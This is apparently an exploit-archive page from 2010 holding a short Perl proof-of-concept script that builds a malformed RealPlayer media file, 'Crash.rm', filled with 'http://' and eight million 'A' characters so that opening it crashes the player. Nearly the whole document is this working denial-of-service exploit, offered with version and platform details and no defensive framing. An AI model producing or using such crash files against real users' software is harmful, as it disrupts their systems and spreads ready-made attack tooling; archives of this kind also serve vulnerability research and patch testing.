[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Real Player Local Crash Poc
# Published : 2010-01-10
# Author : D3V!L FUCKER
# Previous Title : Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DoS Exploit
# Next Title : YPOPS! v0.9.7.3 Buffer Overflow (SEH)
#!/user/bin/perl
# Exploit Title: [Real Player Local Crash Poc]
# Date: [2010/01/09]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.real.com]
# Version: [12.0.0.343]
# Tested on: [windows XP sp2]
# Code :
$boom="http://"."A" x 8000000;
open(myfile,'>>Crash.rm') || die "Cannot Creat filenn";
print myfile $boom;
print "Done..!~#n";